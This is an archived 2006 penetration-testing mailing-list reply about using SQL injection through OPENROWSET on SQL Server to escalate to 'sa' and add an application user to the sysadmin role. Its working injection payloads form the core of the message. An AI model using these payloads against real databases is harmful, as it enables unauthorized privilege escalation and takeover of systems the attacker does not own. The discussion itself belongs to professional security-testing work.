Penetration Testing mailing list archives
RE: custom xp_cmdshell on SQL Server
From: "Victor Chapela" <victor () sm4rt com>
Date: Tue, 19 Sep 2006 19:20:32 -0500
Andy,
Correct. But since I am injecting 'CREATE PROCEDURE' inside an OPENROWSET statement, that should solve the issue, as the SQL code inside the OPENROWSET is executed as a batch in itself (correct me if I am wrong)
You may be right and that would be a nice workaround for the create procedure lockout. Have you tried it locally with openrowset and does it work?
I am running my code as an unprivileged user, but I escalated to 'sa' using OPENROWSET
But I mean an unprivileged OS user. SQL Server not always runs as NT Authority/SYSTEM. If you are 'SA' you inherit SQL Server's privileges and at the operating system level you can still be "guest" or more frequently an account named sql_server or something (which may not have access to executing system32 binaries).
' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer};SERVER=<server>;UID =sa;PWD=<password>',N'select user; declare @u varchar(50); set @u =
(select
rd>system_user); exec master.dbo.sp_addsrvrolemember @u,
''sysadmin'''))-- There is an error in this query I sent you. You should avoid declaring the variable because it is being set within the context of the openrowset query: you will be adding SA to sysadmin the way it is. Try it this way: ' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer}; SERVER=<server>;UID=sa;PWD=<password>',N'select user; exec master.dbo.sp_addsrvrolemember <app user>, ''sysadmin'''))-- Obtain <app user> with [' and 1=system_user --] or [' and 1=user --] In this case both should be the same. Regards, Victor ------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------
Current thread:
- custom xp_cmdshell on SQL Server Andy Lester (Sep 13)
- RE: custom xp_cmdshell on SQL Server Clemens, Dan (Sep 14)
- Re: custom xp_cmdshell on SQL Server Steven M Gill (Sep 15)
- Re: custom xp_cmdshell on SQL Server Stefano Zanero (Sep 15)
- RE: custom xp_cmdshell on SQL Server Victor Chapela (Sep 17)
- RE: custom xp_cmdshell on SQL Server Andy Lester (Sep 18)
- RE: custom xp_cmdshell on SQL Server Victor Chapela (Sep 20)
- RE: custom xp_cmdshell on SQL Server Andy Lester (Sep 18)
- <Possible follow-ups>
- Re: custom xp_cmdshell on SQL Server Zed Qyves (Sep 14)
- User group tool Bud Gordon (Sep 14)
- Re: User group tool Tim (Sep 14)
- Re: User group tool John Skinner (Sep 15)
- RE: User group tool ballares (Sep 15)
- RE: User group tool Weir, Jason (Sep 15)
- User group tool Bud Gordon (Sep 14)
- RE: custom xp_cmdshell on SQL Server Andy Lester (Sep 18)